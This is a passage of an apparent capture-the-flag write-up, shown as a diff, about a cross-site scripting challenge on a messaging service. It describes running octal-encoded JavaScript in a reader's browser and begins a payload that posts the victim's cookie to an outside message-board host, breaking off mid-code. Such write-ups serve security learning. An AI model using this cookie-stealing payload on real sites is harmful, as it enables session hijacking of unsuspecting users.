RealNexa/O24-CTF-Writeups/robberts_secure_messaging_service.md

 This message will allows us to execute any JS code in a readers browser by putting octal encoded JS code in the `PAYLOAD` field.

-The payload I used will post a message of the readers cookie to my user message board.
+The payload I used will post a message of the readers (Robberts) cookie to my user message board.
 ```
 var xhr = new XMLHttpRequest();
 xhr.open('POST', 'https://rorovovarorsospoprorakokeror.appsec.nu/messageboard.php', true);